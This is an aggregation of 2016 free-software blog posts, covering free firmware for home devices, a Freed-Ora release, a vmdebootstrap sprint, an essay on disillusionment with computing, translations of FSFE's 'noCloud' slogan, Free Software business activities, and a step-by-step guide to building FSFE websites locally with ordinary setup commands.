If you are wondering about my experience with Open Source Business Models, then check out Totem Open Health, an initiative I started in 2014 and now continues to conquer the world without me.

Thursday, 01 December 2016

Using a fully free OS for devices in the home

DanielPocock.com - fsfe | 13:11, Thursday, 01 December 2016

There are more and more devices around the home (and in many small offices) running a GNU/Linux-based firmware. Consider routers, entry-level NAS appliances, smart phones and home entertainment boxes.

More and more people are coming to realize that there is a lack of security updates for these devices and a big risk that the proprietary parts of the code are either very badly engineered (if you don't plan to release your code, why code it properly?) or deliberately includes spyware that calls home to the vendor, ISP or other third parties. IoT botnet incidents, which are becoming more widely publicized, emphasize some of these risks.

On top of this is the frustration of trying to become familiar with numerous different web interfaces (for your own devices and those of any friends and family members you give assistance to) and the fact that many of these devices have very limited feature sets.

Many people hail OpenWRT as an example of a free alternative (for routers), but I recently discovered that OpenWRT's web interface won't let me enable both DHCP and DHCPv6 concurrently. The underlying OS and utilities fully support dual stack, but the UI designers haven't encountered that configuration before. Conclusion: move to a device running a full OS, probably Debian-based, but I would consider BSD-based solutions too.
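As an illustration of what a full OS makes straightforward, a Debian-based router could serve DHCP and DHCPv6 concurrently from dnsmasq. This is only a sketch under assumptions: the interface name and address ranges below are invented examples, not taken from the post.

```
# /etc/dnsmasq.d/lan.conf -- example values, adjust for your network
interface=br0

# IPv4 DHCP pool with a 12-hour lease time
dhcp-range=192.168.1.50,192.168.1.150,12h

# IPv6: derive the prefix from br0's own address and hand out
# DHCPv6 leases alongside router advertisements
dhcp-range=::100,::1ff,constructor:br0,64,12h
enable-ra
```

Running both address families from one configuration file is exactly the dual-stack setup that the OpenWRT UI would not allow.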

For many people, the benefit of this strategy is simple: use the same skills across all the different devices, at home and in a professional capacity. Get rapid access to security updates. Install extra packages or enable extra features if really necessary. For example, I already use Shorewall and strongSwan on various Debian boxes and I find it more convenient to configure firewall zones using Shorewall syntax rather than OpenWRT's UI.
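For instance, the Shorewall zone syntax mentioned above looks roughly like this. A minimal three-zone sketch; the zone names are conventional examples, not a configuration from the post:

```
# /etc/shorewall/zones -- example three-zone layout
#ZONE   TYPE
fw      firewall   # the router itself
net     ipv4       # the Internet-facing side
loc     ipv4       # the local network

# /etc/shorewall/policy -- default policies between zones
#SOURCE  DEST  POLICY
loc      net   ACCEPT
net      all   DROP
fw       all   ACCEPT
all      all   REJECT
```

Compared with clicking through a per-device web UI, the same few lines work on any Debian box where Shorewall is installed.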

Which boxes to start with?

There are various considerations when going down this path:

  • Start with existing hardware, or buy new devices that are easier to re-flash? Sometimes there are other reasons to buy new hardware, for example, when upgrading a broadband connection to Gigabit or when an older NAS gets a noisy fan or struggles with SSD performance and in these cases, the decision about what to buy can be limited to those devices that are optimal for replacing the OS.
  • How will the device be supported? Can other non-technical users do troubleshooting? If mixing and matching components, how will faults be identified? If buying a purpose-built NAS box and the CPU board fails, will the vendor provide next day replacement, or could it be gone for a month? Is it better to use generic components that you can replace yourself?
  • Is a completely silent/fanless solution necessary?
  • Is it possible to completely avoid embedded microcode and firmware?
  • How many other free software developers are using the same box, or will you be first?

Discussing these options

I recently started threads on the debian-user mailing list discussing options for routers and home NAS boxes. A range of interesting suggestions has already appeared; it would be great to see any other ideas that people have about these choices.

Monday, 28 November 2016

Freed-Ora 25 released

Marcus's Blog | 11:13, Monday, 28 November 2016

Freed-Ora is a Libre version of Fedora GNU/Linux which comes with the Linux-libre kernel and the Icecat browser.
The procedure for creating Live media has changed within Fedora, and the image has been built using livemedia-creator instead of livecd-creator. The documentation on how to build the image can be found here.
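For reference, a livemedia-creator invocation for building a live ISO typically looks something like the following. The kickstart filename, project labels and paths are placeholders for illustration, not values from this post:

```
# Build a live ISO directly on the host (no VM) from a kickstart file;
# all names and paths here are illustrative placeholders.
livemedia-creator --make-iso --no-virt \
    --ks=freed-ora-live.ks \
    --project Freed-Ora --releasever 25 \
    --resultdir /var/tmp/freed-ora-25
```

The main conceptual change from livecd-creator is that livemedia-creator drives an Anaconda installation from a kickstart file rather than assembling the image directly.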

Please download the Freed-Ora 25 ISO and give feedback.

Friday, 25 November 2016

vmdebootstrap Sprint Report

Iain R. Learmonth | 12:06, Friday, 25 November 2016

This is now a little overdue, but here it is. On the 10th and 11th of November, the second vmdebootstrap sprint took place. Lars Wirzenius (liw), Ana Custura (ana_c) and myself were present. liw focussed on the core of vmdebootstrap, where he sketched out what the future of vmdebootstrap may look like. He documented this in a mailing list post and also presented (video).

Ana and myself worked on live-wrapper, which uses vmdebootstrap internally for the squashfs generation. I worked on improving logging, using a better method for getting paths within the image, enabling generation of Packages and Release files for the image archive and also made the images installable (live-wrapper 0.5 onwards will include an installer by default).

Ana worked on the inclusion of HDT and memtest86+ in the live images and enabled both ISOLINUX (for BIOS boot) and GRUB (for EFI boot) to boot the text-mode and graphical installers.

live-wrapper 0.5 was released on the 16th of November with these fixes included. You can find live-wrapper documentation at https://live-wrapper.readthedocs.io/en/latest/. (The documentation still needs some work; some options may be incorrectly described.)

Thanks to the sponsors that made this work possible. You’re awesome. (:

Monday, 21 November 2016

21 November 1916

DanielPocock.com - fsfe | 18:31, Monday, 21 November 2016

There has been a lot of news recently about the 100th anniversaries of various events that took place during the Great War.

On 21 November 1916, the SS Hunscraft sailed from Southampton to France. My great grandfather, Robert Pocock, was aboard.

He was part of the Australian Imperial Force, 3rd Divisional Train.

It's sad that Australians had to travel half way around the world to break up fist fights and tank battles. Sadder still that some people who romanticize the mistakes of imperialism are being appointed to significant positions of power.

Fortunately my great grandfather returned to Australia in one piece, many Australians didn't.

Robert Pocock's war medals

Sunday, 20 November 2016

On Not Liking Computers

Paul Boddie's Free Software-related blog » English | 23:57, Sunday, 20 November 2016

Adam Williamson recently wrote about how he no longer really likes computers. This attracted many responses from people who misunderstood him and decided to dispense career advice, including doses of the usual material about “following one’s passion” or “changing one’s direction” (which usually involves becoming some kind of “global nomad”), which do make me wonder how some of these people actually pay their bills. Do they have a wealthy spouse or wealthy parents or “an inheritance”, or do they just do lucrative contracting for random entities whose nature or identities remain deliberately obscure to avoid thinking about where the money for those jobs really comes from? Particularly the latter would be the “global nomad” way, as far as I can tell.

But anyway, Adam appears to like his job: it’s just that he isn’t interested in technological pursuits outside working hours. At some level, I think we can all sympathise with that. For those of us who have similarly pessimistic views about computing, it’s worth presenting a list of reasons why we might not be so enthusiastic about technology any more, particularly for those of us who also care about the ethical dimensions, not merely whether the technology itself is “any good” or whether it provides a sufficient intellectual challenge. By the way, this is my own list: I don’t know Adam from, well, Adam!

Lack of Actual Progress

One may be getting older and noticing that the same technological problems keep occurring again and again, never getting resolved, while seeing people with no sense of history provoke change for change’s – not progress’s – sake. After a while, or when one gets to a certain age, one expects technology to just work and that people might have figured out how to get things to communicate with each other, or whatever, by building on what went before. But then it usually seems to be the case that some boy genius or other wanted a clear run at solving such problems from scratch, developing lots of flashy features but not the mundane reliability that everybody really wanted.

People then get told that such “advanced” technology is necessarily complicated. Whereas once upon a time, you could pick up a telephone, dial a number, have someone answer, and conduct a half-decent conversation, now you have to make sure that the equipment is all connected up properly, that all the configurations are correct, that the Internet provider isn’t short-changing you or trying to suppress your network traffic. And then you might dial and not get through, or you might have the call mysteriously cut out, or the audio quality might be like interviewing a gang of squabbling squirrels speaking from the bottom of a dustbin/trashcan.

Depreciating Qualifications

One may be seeing a profession that requires a fair amount of educational investment – which, thanks to inept/corrupt politicians, also means a fair amount of financial investment – become devalued to the point that its practitioners are regarded as interchangeable commodities who can be coerced into working for as little as possible. So much for the “knowledge economy” when its practitioners risk ending up earning less than people doing so-called “menial” work who didn’t need to go through a thorough higher education or keep up an ongoing process of self-improvement to remain “relevant”. (Not that there’s anything wrong with “menial” work: without people doing unfashionable jobs, everything would grind to a halt very quickly, whereas quite a few things I’ve done might as well not exist, so little difference they made to anything.)

Now we get told that programming really will be the domain of “artificial intelligence” this time around. That instead of humans writing code, “high priests” will merely direct computers to write the software they need. Of course, such stuff sounds great in Wired magazine and rather amusing to anyone with any actual experience of software projects. Unfortunately, politicians (and other “thought leaders”) read such things one day and then slash away at budgets the next. And in a decade’s time, we’ll be suffering the same “debate” about a lack of “engineering talent” with the same “insights” from the usual gaggle of patent lobbyists and vested interests.

Neoliberal Fantasy Economics

One may have encountered the “internship” culture where as many people as possible try to get programmers and others in the industry to work for nothing, making them feel as if they need to do so in order to prove their worth for a hypothetical employment position or to demonstrate that they are truly committed to some corporate-aligned goal. One reads or hears people advocating involvement in “open source” not to uphold the four freedoms (to use, share, modify and distribute software), but instead to persuade others to “get on the radar” of an employer whose code has been licensed as Free Software (or something pretending to be so) largely to get people to work for them for free.

Now, I do like the idea of employers getting to know potential employees by interacting in a Free Software project, but it should really only occur when the potential employee is already doing something they want to do because it interests them and is in their interests. And no-one should be persuaded into doing work for free on the vague understanding that they might get hired for doing so.

The Expendable Volunteers

One may have seen the exploitation of volunteer effort where people are made to feel that they should “step up” for the benefit of something they believe in, often requiring volunteers to sacrifice their own time and money to do such free work, and often seeing those volunteers being encouraged to give money directly to the cause, as if all their other efforts were not substantial contributions in themselves. While striving to make a difference around the edges of their own lives, volunteers are often working in opposition to well-resourced organisations whose employees have the luxury of countering such volunteer efforts on a full-time basis and with a nice salary. Those people can go home in the evenings and at weekends and tune it all out if they want to.

No wonder volunteers burn out or decide that they just don’t have time or aren’t sufficiently motivated any more. The sad thing is that some organisations ignore this phenomenon because there are plenty of new volunteers wanting to “get active” and “be visible”, perhaps as a way of marketing themselves. Then again, some communities are content to alienate existing users if they can instead attract the mythical “10x” influx of new users to take their place, so we shouldn’t really be surprised, I suppose.

Blame the Powerless

One may be exposed to the culture that if you care about injustices or wrongs then bad or unfortunate situations are your responsibility even if you had nothing to do with their creation. This culture pervades society and allows the powerful to do what they like, to then make everyone else feel bad about the consequences, and to virtually force people to just accept the results if they don’t have the energy at the end of a busy day to do the legwork of bringing people to account.

So, those of us with any kind of conscience at all might already be supporting people trying to do the right thing like helping others, holding people to account, protecting the vulnerable, and so on. But at the same time, we aren’t short of people – particularly in the media and in politics – telling us how bad things are, with an air of expectation that we might take responsibility for something supposedly done on our behalf that has had grave consequences. (The invasion and bombing of foreign lands is one depressingly recurring example.) Sadly, the feeling of powerlessness many people have, as the powerful go round doing what they like regardless, is exploited by the usual cynical “divide and rule” tactics of other powerful people who merely see the opportunities in the misuse of power and the misery it causes. And so, selfishness and tribalism proliferate, demotivating anyone wanting the world to become a better place.

Reversal of Liberties

One may have had the realisation that technology is no longer merely about creating opportunities or making things easier, but is increasingly about controlling and monitoring people and making things complicated and difficult. That sustainability is sacrificed so that companies can cultivate recurring and rich profit opportunities by making people dependent on obsolete products that must be replaced regularly. And that technology exacerbates societal ills rather than helping to eradicate them.

We have the modern Web whose average site wants to “dial out” to a cast of recurring players – tracking sites, content distribution networks (providing advertising more often than not), font resources, image resources, script resources – all of which contribute to making the “signal-to-noise” ratio of the delivered content smaller and smaller all the time. Where everything has to maintain a channel of communication to random servers to constantly update them about what the user is doing, where they spent most of their time, what they looked at and what they clicked on. All of this requiring hundreds of megabytes of program code and data, burning up CPU time, wasting energy, making computers slow and steadily obsolete, forcing people to throw things away and to buy more things to throw away soon enough.

We have the “app” ecosystem experience, with restrictions on access, competition and interoperability, with arbitrarily-curated content: the walled gardens that the likes of Apple and Microsoft failed to impose on everybody at the dawn of the “consumer Internet” but do so now under the pretences of convenience and safety. We have social networking empires that serve fake news to each person’s little echo chamber, whipping up bubbles of hate and distracting people from what is really going on in the world and what should really matter. We have “cloud” services that often offer mediocre user experiences but which offer access from “any device”, with users opting in to both the convenience of being able to get their messages or files from their phone and the surveillance built into such services for commercial and governmental exploitation.

We have planned obsolescence designed into software and hardware, with customers obliged to buy new products to keep doing the things they want to do with those products and to keep it a relatively secure experience. And we have dodgy batteries sealed into devices, with the obligation apparently falling on the customers themselves to look after their own safety and – when the product fails – the impact of that product on the environment. By burdening the hapless user of technology with so many caveats that their life becomes dominated by them, those things become a form of tyranny, too.

Finding Meaning

Many people need to find meaning in their work and to feel that their work aligns with their own priorities. Some people might be able to do work that is unchallenging or uninteresting and then pursue their interests and goals in their own time, but this may be discouraging and demotivating over the longer term. When people’s work is not orthogonal to their own beliefs and interests but instead actively undermines them, the result is counterproductive and even damaging to those beliefs and interests and to others who share them.

For example, developing proprietary software or services in a full-time job, although potentially intellectually challenging, is likely to undermine any realistic level of commitment in one’s own free time to Free Software that does the same thing. Some people may prioritise a stimulating job over the things they believe in, feeling that their work still benefits others in a different way. Others may feel that they are betraying Free Software users by making people reliant on proprietary software and causing interoperability problems when those proprietary software users start assuming that everything should revolve around them, their tools, their data, and their expectations.

Although Adam wasn’t framing this shift in perspectives in terms of his job or career, it might have an impact on some people in that regard. I sometimes think of the interactions between my personal priorities and my career. Indeed, the way that Adam can seemingly stash his technological pursuits within the confines of his day job, while leaving the rest of his time for other things, was some kind of vision that I once had for studying and practising computer science. I think he is rather lucky in that his employer’s interests and his own are aligned sufficiently for him to be able to consider his workplace a venue for furthering those interests, doing so sufficiently to not need to try and make up the difference at home.

We live in an era of computational abundance and yet so much of that abundance is applied ineffectively and inappropriately. I wish I had a concise solution to the complicated equation involving technology and its effects on our quality of life, if not for the application of technology in society in general, then at least for individuals, and not least for myself. Maybe a future article needs to consider what we should expect from technology, as its application spreads ever wider, such that the technology we use and experience upholds our rights and expectations as human beings instead of undermining and marginalising them.

It’s not hard to see how even those who were once enthusiastic about computers can end up resenting them and disliking what they have become.

Friday, 18 November 2016

Localizing our noCloud slogan

English Planet – Dreierlei | 15:12, Friday, 18 November 2016

there is noCloud

At FSFE we have been asked many times to come up with translations of our popular “There is no CLOUD, just other people’s computers” slogan. This week we started the localization by asking our translator team, and we were very surprised to see them come up with translations in 16 different languages right away.

In addition, our current trainee Olga Gkotsopoulou asked her international network, and we asked on Twitter for additional translations. And, what can I say? Crowdsourcing seldom felt so appealing. Within two hours we got 8 more translations, and after 24 hours we already had 30 translations.

The speed with which we received so many translations shows us that the slogan indeed captures the spirit of the time. People are happy to translate it because they love to send this message out. At the time of writing we have 36 translations and two dialects on our wiki page:

[AR] لا يوجد غيم, هناك أخرين كمبيوتر
[BR] N’eus Cloud ebet. Urzhiataerioù tud all nemetken.
[CAT] No hi ha cap núvol, només ordinadors d’altres persones.
[DA] Der findes ingen sky, kun andre menneskers computere.
[DE] Es gibt keine Cloud, nur die Computer anderer Leute.
[EL] Δεν υπάρχει Cloud, μόνο υπολογιστές άλλων.
[EU] Ez dago lainorik, beste pertsona batzuen ordenagailuak baino ez.
[EO] Nubon ne ekzistas sed fremdaj komputiloj.
[ES] La nube no existe, son ordenadores de otras personas.
[ET] Pole mingit pilve, on vaid teiste inimeste arvutid.
[FA] فضای ابری در کار نیست، تنها رایانه های دیگران
[FR] Il n’y a pas de cloud, juste l’ordinateur d’un autre.
[FI] Ei ole pilveä, vain toisten ihmisten tietokoneita.
[GL] A nube non existe, só son ordenadores doutras persoas.
[GA] Níl aon néal ann, níl ann ach ríomhairí daoine eile.
[HE] אין ענן, רק מחשבים של אנשים אחרים
[HY] Չկա ամպ, կա պարզապես այլ մարդկանց համակարգիչներ
[IT] Il cloud non esiste, sono solo i computer di qualcun altro
[JP] クラウドはありません。 他の人のコンピュータだけがあります。
[KA] არ არის საწყობი ,მხოლოდ ბევრი ეტიკეტებია ხალხში სხვადასხვა ენებზე
[KL] Una pujoqanngilaq – qarasaasiat allat kisimik
[KO] 구름은 없다. 다른 사람의 컴퓨터일뿐.
[LB] Et gëtt keng Cloud, just anere Leit hier Computeren.
[NL] De cloud bestaat niet, alleen computers van anderen
[TR] Bulut diye bir şey yok, sadece başkalarının bilgisayarları var.
[TL] walang ulap kundi mga kompyuter ng ibang tao
[PL] Nie ma chmury, są tylko komputery innych.
[PT] Não há nuvem nenhuma, há apenas computadores de outras pessoas.
[RO] Nu există nici un nor, doar calculatoarele altor oameni.
[RS] Ne postoji Cloud, već samo računari drugih ljudi.
[RU] Облака нет, есть чужие компьютеры.
[SQ] S’ka cloud, thjesht kompjutera personash të tjerë.
[SV] Det finns inget moln, bara andra människors datorer.
[UR] کلاوڈ سرور کچھ نہیی، بس کسی اور کاکمپیوٹر۔
[VI] Không có Đám mây, chỉ có những chiếc máy tính của kẻ khác.
[ZH] 没有云,只有人们的电脑.

And again: If you miss your language or dialect, add it to the wiki, leave it as a comment or write me a message and I will add it.

Tuesday, 15 November 2016

There is no Free Software company - But!

Matthias Kirschner's Web log - fsfe | 09:22, Tuesday, 15 November 2016

Since the start of the FSFE 15 years ago, the people involved have been certain that companies are a crucial part of reaching our goal of software freedom. For many years we have explained to companies – IT as well as non-IT – what benefits they gain from Free Software. We encourage individuals and companies to pay for Free Software, just as we encourage companies to use Free Software in their offers.

A factory building

While more people demanded Free Software, we also saw more companies claiming something is Free Software or Open Source Software although it is not. This behaviour – also called "openwashing" – is not unique to Free Software; some companies likewise claim something is "organic" or "fair-trade" although it is not. As the attempts to get a trademark for "Open Source" failed, it is difficult to legally prevent companies from calling something "Free Software" or "Open Source Software" even though it complies neither with the Free Software definition by the Free Software Foundation nor with the Open Source definition by the Open Source Initiative.

When the FSFE was founded in 2001 there was already the idea to encourage and support companies making money with Free Software by starting a "GNU business network". One of the stumbling blocks was always the definition of a Free Software company. It cannot just be about the usage of Free Software or the contribution to Free Software; it also needs to include what rights they offer their customers. Another factor was whether the revenue stream is tied to proprietary licensing conditions. Would we also allow a small revenue from proprietary software, and if so, how high could it be before we could no longer consider it a Free Software company?

It turned out to be a very complicated issue, and although we discussed it regularly, we had no idea how to approach the problems of defining a Free Software company.

During our last meeting of the FSFE's General Assembly – triggered by our new member Mirko Böhm – we came to the conclusion that there was a flaw in our thinking and that it does not make sense to think about "Free Software companies". In hindsight it might look obvious, but for me the discussion was an eye opener, and I have the feeling that was a huge step for software freedom.

As a side note: When we have the official general assembly of the FSFE we always use this opportunity to have more discussions during the days before or after. Sometimes they focus on internal topics, organisational changes, but often there is brainstorming about the "hot topics of software freedom" and where the FSFE has to engage in the long run. At this year's meeting, from 7 to 9 October, inspired by Georg Greve's and Nicolas Dietrich's input, we spent the whole Saturday thinking about the long term challenges for software freedom with the focus on the private sector.

We talked about the challenges of software freedom presented by economies of scale, networking effects, investment preference, and users making convenience and price based decisions over values – even when they declare themselves value conscious.

One problem identified there as preventing a wider spread of software freedom was that Free Software is being undermined by companies that abuse the positive brand recognition of Free Software / Open Source by "openwashing" themselves. Sometimes they offer products that do not even have a Free Software version. This penalises companies and groups that aim to work within the principles of Free Software and damages the recognition of Free Software / Open Source in the market. The consequence is reduced confidence in Free Software, fewer developers working on it, fewer companies providing it, and less Free Software being written in favour of proprietary models.

In the discussion, one question kept arising: is an activity that is good for Free Software more valuable when it is the sole activity of one small company than when the same thing is done as part of a larger enterprise? We all agree that a small company which has used and distributed exclusively Free Software for many years, and of whose software no part was ever non-free, is a good thing. But what happens if said small, focused company gets purchased by a larger entity? Does that invalidate the benefit of what is being done?

We concluded that good action remains good action, and that the FSFE should encourage good actions. So instead of focusing on the company as such, we should focus on the activity itself; we should think about "Free Software business activities", "Free Software business offers", and the like. My feeling was that this was the moment the penny dropped, as others and I realised the flaw in our previous thinking. We need action-oriented approaches and we need to look at activities individually.

There was still the question of where to draw the line between acceptable or useful activities and harmful ones. This is not a black-and-white issue, and when assessing the impact on software freedom there are different levels. For example, if you evaluate a sharing platform, you might find out that the core is Free Software, but the sharing module itself is proprietary. This is a bad offer if you want to run a competing sharing platform using Free Software.

The counter example of an acceptable offer was a collaboration software that was useful and complete, but where connecting a proprietary client would itself require a proprietary connector. It was also discussed that sometimes you need to interface with proprietary systems through proprietary libraries that do not allow connecting with Free Software unless one were to first replace the entire API/library itself.

Ultimately a consensus emerged around a focus on the four freedoms of Free Software in relation to the question of whether the software is sufficiently complete and useful to run a competing business.

One thought was to run "test cases" to evaluate how good an offer is on the Free Software scale – something like a regular bulletin about best and worst practice. We could look at a business activity, study it according to the criteria below, evaluate it, and make that evaluation and its conclusions public. That way we can help build customer awareness of software freedom. Here is a first idea for a scale:

  • EXCELLENT: Free Software only and on all levels, no exceptions.

  • GOOD: Free Software as a complete, useful, and fully supportable product. Support available for Free Software version.

  • ACCEPTABLE: Proprietary interfaces to proprietary systems and applications, especially complex systems that require complex APIs/libraries/SDKs, as long as the above is still met.

  • BAD: Essential / important functionality only available as proprietary software, critical functionality missing from the Free Software version (one example of an essential functionality was an LDAP connector).

  • REALLY BAD: Fully proprietary, but claiming to be Free Software / Open Source Software.

Now I would like to know from you: what is your first reaction on this? Would you like to add something? Do you have ideas what should be included in a checklist for such a test? Would you be interested to help us to evaluate how good some offers are on such a scale?

To summarise, I believe it was a mistake to think about businesses as a whole, and that if we want to take the next big steps we should think about Free Software business offers / activities – at least until we have a better name for what I described above. We should help companies avoid being deluded by people merely claiming something is Free Software, and give them the tools to check for themselves.

PS: Thank you very much to the participants at the FSFE meeting, especially Georg Greve for pushing this topic and internally summarising our discussion, and Mirko Böhm, whose contribution was the trigger in the discussion for realising the flaw in our previous thinking.

Sunday, 13 November 2016

Build FSFE websites locally

English – Max's weblog | 23:00, Sunday, 13 November 2016

Note: This guide is also available in FSFE’s wiki now, and it will be the only version maintained. So please head over to the wiki if you’re planning to follow this guide.

Those who create, edit, and translate FSFE websites already know that the source files are XHTML files which are built with an XSLT processor, including a lot of custom stuff. One of the huge advantages of that is that we don’t have to rely on dynamic website processors and databases; on the other hand there are a few drawbacks as well: websites need a few minutes to be generated by the central build system, and it’s quite easy to mess up the XML syntax. So if an editor wants to create or edit a page, she needs to wait a few minutes every time she wants to test how the website looks. In this guide I will show how to build single websites on your own computer in a fraction of the central system’s build time, so you’ll only need to commit your changes once the file looks the way you want. All you need is a bit of hard disk space and around one hour to set everything up.

The whole idea is based on what FSFE’s webmaster Paul Hänsch has coded and written. On his blog he explains the new build script. He explains how to build files locally, too. However, this guide aims to make it a bit easier and more verbose.

Before we’re getting started, let me shortly explain the concept of what we’ll be doing. Basically, we’ll have three directories: trunk, status, and fsfe.org. Most likely you already have trunk, it’s a clone of the FSFE’s main SVN repository, and the source of all operations. All those files in there have to be compiled to generate the final HTML files we can browse. The location of these finished files will be fsfe.org. status, the third directory, contains error messages and temporary files.

After we (1) created these directories, partly by downloading a repository with some useful scripts and configuration files, we’ll (2) build the whole FSFE website on our own computer. In the next step, we’ll (3) set up a local webserver so you can actually browse these files. And lastly we’ll (4) set up a small script which you can use to quickly build single XHTML files. Last but not least I’ll give some real-world examples.

1. Clone helper repository

Firstly, clone a git repository which will give you most of the files and directories needed for the further operations. It was created by me and contains configuration files and the script that will make building single files easier. Of course, you can also do everything manually.

In general, this is the directory structure I propose. In the following I’ll stick to this scheme. Please adapt all changes if your folder tree looks differently.

trunk (~700 MB):      ~/subversion/fsfe/fsfe-web/trunk/
status (~150 MB):     ~/subversion/fsfe/local-build/status/
fsfe.org (~1000 MB):  ~/subversion/fsfe/local-build/fsfe.org/

(For those not so familiar with the GNU/Linux terminal: ~ is the short version of your home directory, so for example /home/user. ~/subversion is the same as /home/USER/subversion, given that your username is USER)

To continue, you have to have git installed on your computer (sudo apt-get install git). Then, please execute via terminal following command. It will copy the files from my git repository to your computer and already contains the folders status and fsfe.org.

git clone https://src.mehl.mx/mxmehl/fsfe-local-build.git ~/subversion/fsfe/local-build

Now we take care of trunk. In case you already have a copy of trunk on your computer, you can use this location, but please do a svn up beforehand and be sure that the output of svn status is empty (so no new or modified files on your side). If you don’t have trunk yet, download the repository to the proposed location:

svn --username $YourFSFEUsername co https://svn.fsfe.org/fsfe-web/trunk ~/subversion/fsfe/fsfe-web/trunk

2. Build full website

Now we have to build the whole FSFE website locally. This will take quite a while, but we’ll only have to do it once. Later, you’ll build just single files and not the >14000 we build now.

But first, we have to install a few applications which are needed by the build script (Warning: it’s possible your system lacks some other required applications which were already installed on mine. If you encounter any command not found errors, please report them in the comments or by mail). So let’s install them via the terminal:

sudo apt-get install make libxslt

Note: libxslt may have a different name in your distribution, e.g. libxslt1.1 or libxslt2.

Now we can start building. The full website build can be started with:

~/subversion/fsfe/fsfe-web/trunk/build/build_main.sh --statusdir ~/subversion/fsfe/local-build/status/ build_into ~/subversion/fsfe/local-build/fsfe.org/

See? We use the build routine from trunk to build trunk itself. All status messages are written to status, and the final website will reside in fsfe.org. Mind the differing directory names if your structure differs from mine. This process will take a long time, depending on your CPU power. Don’t be afraid of strange messages and massive walls of text ;-)

After the long process has finished, navigate to the trunk directory and execute svn status. You may see a few files which are new:

max@bistromath ~/s/f/f/trunk> svn status
?       about/printable/archive/printable.en.xml
?       d_day.en.xml
?       d_month.en.xml
?       d_year.en.xml
?       localmenuinfo.en.xml
[...]

These are leftovers from the full website build. Because trunk is supposed to be your productive source directory from which you also make commits to the FSFE SVN, let’s delete these files. You won’t need them anymore.

rm about/printable/archive/printable.en.xml d_day.en.xml d_month.en.xml d_year.en.xml localmenuinfo.en.xml
rm tools/tagmaps/*.map

Afterwards, the output of svn status should be empty again. It is? Fine, let’s go on! If not, please also remove those files (and tell me which files were missing).

3. Set up local webserver

After the full build is completed, you can install a local webserver. This is necessary to actually display the locally built files in your browser. In this example, I assume you don’t already have a webserver installed, and that you’re using a Debian-based operating system. So let’s install lighttpd which is a thin and fast webserver, plus gamin which lighttpd needs in some setups:

sudo apt-get install lighttpd gamin

To make lighttpd run properly we need a configuration file. It has to point the webserver at the files in the fsfe.org directory. You already downloaded my recommended config file (lighttpd-fsfe.conf.sample) by cloning the git repository, but you’ll have to rename it and modify the path accordingly. So rename the file to lighttpd-fsfe.conf, open it, and change the following line to match the actual and absolute path of the fsfe.org directory (~ does not work here):

server.document-root = "/home/USER/subversion/fsfe/local-build/fsfe.org"
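If you prefer to see the whole picture, a minimal configuration in this spirit could look like the following. This is only a sketch based on this guide: the port 5080 is taken from the URLs below, while the index and MIME type settings are my assumptions; your downloaded lighttpd-fsfe.conf.sample remains authoritative.

```conf
# Minimal lighttpd configuration sketch for the local FSFE preview.
# Serve the locally built HTML files from the fsfe.org directory:
server.document-root = "/home/USER/subversion/fsfe/local-build/fsfe.org"
# This guide uses port 5080, i.e. http://localhost:5080
server.port          = 5080
# Serve an index file when a bare directory is requested
index-file.names     = ( "index.html", "index.en.html" )
# A few MIME types so browsers render pages and styles correctly
mimetype.assign      = ( ".html" => "text/html",
                         ".css"  => "text/css",
                         ".png"  => "image/png",
                         ".jpg"  => "image/jpeg" )
```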

Now you can test whether the webserver is correctly configured. To start a temporary webserver process, execute the next command in the terminal:

lighttpd -Df ~/subversion/fsfe/local-build/lighttpd-fsfe.conf

Until you press Ctrl+C, you should be able to open your local FSFE website in any browser using the URL http://localhost:5080. For example, open http://localhost:5080/contribute/contribute.en.html in your browser. You should see basically the same website as the original fsfe.org. If not, double-check the paths, whether the lighttpd process is still running, and whether the full website build has actually finished.

4. Single page build script

Until now, you didn’t see much more than you can see on the original website. But in this step, we’ll configure and start using a Bash script (fsfe-preview.sh) I’ve written to make a preview of a locally edited XHTML file as comfortable as possible. You already downloaded it by cloning the repository.

First, rename and edit the script’s configuration file: rename config.cfg.sample to config.cfg and open it. The file contains all the paths we already used here, so please adapt them to your structure if necessary. Normally, it should be sufficient to modify the values for LOC_trunk (trunk directory) and LOC_out (fsfe.org directory); the rest can be left at the default values.

Another feature of fsfe-preview is that it automatically checks the XML syntax of the files. For this, libxml2-utils, which contains xmllint, has to be installed. Please execute:

sudo apt-get install libxml2-utils

Now let’s make the script easy to access via the terminal for future usage. For this, we’ll create a short link to the script from one of the binary path directories. Type in the terminal:

sudo ln -s ~/subversion/fsfe/local-build/fsfe-preview.sh /usr/bin/fsfe-preview

From this moment on, you should be able to call fsfe-preview from anywhere in your terminal. Let’s make a test run. Modify the XHTML source file contribute/contribute.en.xhtml and edit some obvious text or alter the title. Now do:

fsfe-preview ~/subversion/fsfe/fsfe-web/trunk/contribute/contribute.en.xhtml

As output, you should see something like:

[INFO] Using file /home/max/subversion/fsfe/fsfe-web/trunk/contribute/contribute.en.xhtml as source...
[INFO] XHTML file detected. Going to build into /home/max/subversion/fsfe/local-build/fsfe.org/contribute/contribute.en.html ...
[INFO] Starting webserver

[SUCCESS] Finished. File can be viewed at http://localhost:5080/contribute/contribute.en.html

Now open the mentioned URL http://localhost:5080/contribute/contribute.en.html and take a look whether your changes had an effect.

Recommended workflows

In this section I’ll present a few of the cases you might face and how to solve them with the script. I presume you have your terminal opened in the trunk directory.

Preview a single file

To preview a single file before uploading it, just edit it locally. The file has to be located in the trunk directory, so I suggest using only one SVN trunk on your computer; it makes little sense to store your edited files in different folders. To preview the file, just give its path as an argument to fsfe-preview, just as we did in the preceding step:

fsfe-preview activities/radiodirective/statement.en.xhtml

The script detects whether the file has to be built with the XSLT processor (.xhtml files), or if it just can be copied to the website without any modification (e.g. images).
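That decision can be pictured as a simple check of the file extension. The following is only a hypothetical sketch of the idea, not the actual fsfe-preview code:

```shell
# Hypothetical sketch of fsfe-preview's dispatch (not the real script):
# .xhtml sources go through the XSLT build, everything else is copied as-is.
dispatch() {
  case "$1" in
    *.xhtml) echo "build: $1" ;;  # the real script would run the XSLT processor
    *)       echo "copy: $1"  ;;  # the real script would copy into fsfe.org/
  esac
}

dispatch contribute/contribute.en.xhtml   # build: contribute/contribute.en.xhtml
dispatch news/2016/graphics/report1.png   # copy: news/2016/graphics/report1.png
```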

Copy many files at once

Beware that all files you added in your session have to be processed with the script. For example, if you create a report with many images included and want to preview it, you will have to copy all these images to the output directory as well, not only the XHTML file. For this, there is the --copy argument. It circumvents the whole XSLT build process and plainly copies the given files (or folders). In this example, the workflow could look like the following: the first line copies some images, the second builds the corresponding XHTML file which makes use of them:

fsfe-preview --copy news/2016/graphics/report1.png news/2016/graphics/report2.jpg
fsfe-preview news/2016/news-20161231-01.en.xhtml

Syntax check

